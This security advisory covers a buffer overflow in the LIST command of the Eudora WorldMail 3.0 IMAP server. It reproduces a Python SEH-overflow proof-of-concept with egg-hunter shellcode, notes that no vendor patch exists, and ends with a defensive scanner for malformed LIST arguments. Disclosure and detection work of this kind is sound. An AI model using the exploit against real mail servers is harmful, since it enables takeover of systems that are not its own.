Release date: 2012-01-12
Updated: 2012-01-16

Affected systems:
Eudora WorldMail 3.0

Description:
--------------------------------------------------------------------------------
BUGTRAQ ID: 51403

Eudora WorldMail is a mail server for the Windows platform. Its implementation of the LIST command contains a buffer overflow vulnerability. An attacker can exploit it to execute arbitrary code and take control of the application and the underlying system.

<*Source: TheXero
*>

Test method:
--------------------------------------------------------------------------------
Warning

The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Use at your own risk!

TheXero () provided the following test method:

#!/usr/bin/python
import sys
import socket

## Exploit Title: WorldMail imapd 3.0 SEH overflow (egg hunter)
## Tested on: XP SP3 en-us
## Author: TheXero
## Website: www.thexero.co.uk
## http://www.nullsecurity.net

## Check for parameters
if len(sys.argv) != 3:
    print "Usage: " + sys.argv[0] + " 127.0.0.1 143"
    quit()

## Assigns the parameters
target = sys.argv[1]
port = int(sys.argv[2])

## Sets up the socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

## Sets the variables
char = "}"
nseh = "\xeb\x06\x90\x90"
seh = "\x4e\x3b\x01\x10" ## 10013B4E |. 59 POP ECX mailcmn.dll
buffer = "\x90" * 8
shellcode = ("T00WT00W" ## Bindshell port 4444
)

## Calculates the size of junk depending on the shellcode
junk = "\x41" * (769 - len(shellcode))

## Egg Hunter
hunter = ("\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05"
"\x5a\x74\xef\xb8\x54\x30\x30\x57\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7")

## Assembles the buffer
buffer = char + junk + shellcode + nseh + seh + hunter + char

## Connects
s.connect((target,port))
data=s.recv(1024)
s.send("a001 LIST " + buffer + "\r\n")
s.close()

Recommendations:
--------------------------------------------------------------------------------
Vendor patch:

Eudora
------
The vendor has not yet released a patch or upgrade. Users of this software are advised to watch the vendor's home page for the latest version:

http://www.eudora.com/worldmail/
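With no vendor patch available, oversized or malformed LIST arguments can be flagged at an IMAP proxy or in captured client traffic. The following is an added example, not part of the original advisory or the vendor's code; the 256-byte limit, the function names and the sample lines are assumptions constructed for illustration.

```python
import re

# Assumed policy limit for a LIST argument; not a value from the advisory.
MAX_LIST_ARG_LEN = 256
# Well-formed IMAP literal marker at the end of a line, e.g. {12} or {12+}
LITERAL_RE = re.compile(rb"\{\d+\+?\}$")

def inspect_imap_line(line):
    """Return the reasons a client line looks like a LIST overflow attempt."""
    parts = line.rstrip(b"\r\n").split(b" ", 2)
    if len(parts) < 3 or parts[1].upper() != b"LIST":
        return []
    args, reasons = parts[2], []
    if len(args) > MAX_LIST_ARG_LEN:
        reasons.append("oversized LIST argument (%d bytes)" % len(args))
    if any(b < 0x20 or b > 0x7E for b in args):
        reasons.append("non-printable bytes in LIST argument")
    # Heuristic: braces are expected only as a trailing literal marker.
    rest = LITERAL_RE.sub(b"", args)
    if b"{" in rest or b"}" in rest:
        reasons.append("brace outside a literal marker")
    return reasons

def scan(lines):
    """Return (line number, reasons) for every flagged line."""
    hits = []
    for number, line in enumerate(lines, 1):
        reasons = inspect_imap_line(line)
        if reasons:
            hits.append((number, reasons))
    return hits

# Constructed sample traffic (client-to-server lines), not captured data.
SAMPLE = [
    b'a001 LOGIN user pass\r\n',
    b'a002 LIST "" "*"\r\n',
    b'a003 LIST "" {5}\r\n',
    b"a004 LIST }" + b"A" * 800 + b"\x90\x90}\r\n",
]

if __name__ == "__main__":
    for number, reasons in scan(SAMPLE):
        print("line %d: %s" % (number, "; ".join(reasons)))
```

The brace check is a heuristic: a quoted mailbox name may legitimately contain a brace, so treat that reason as a signal to review rather than a verdict.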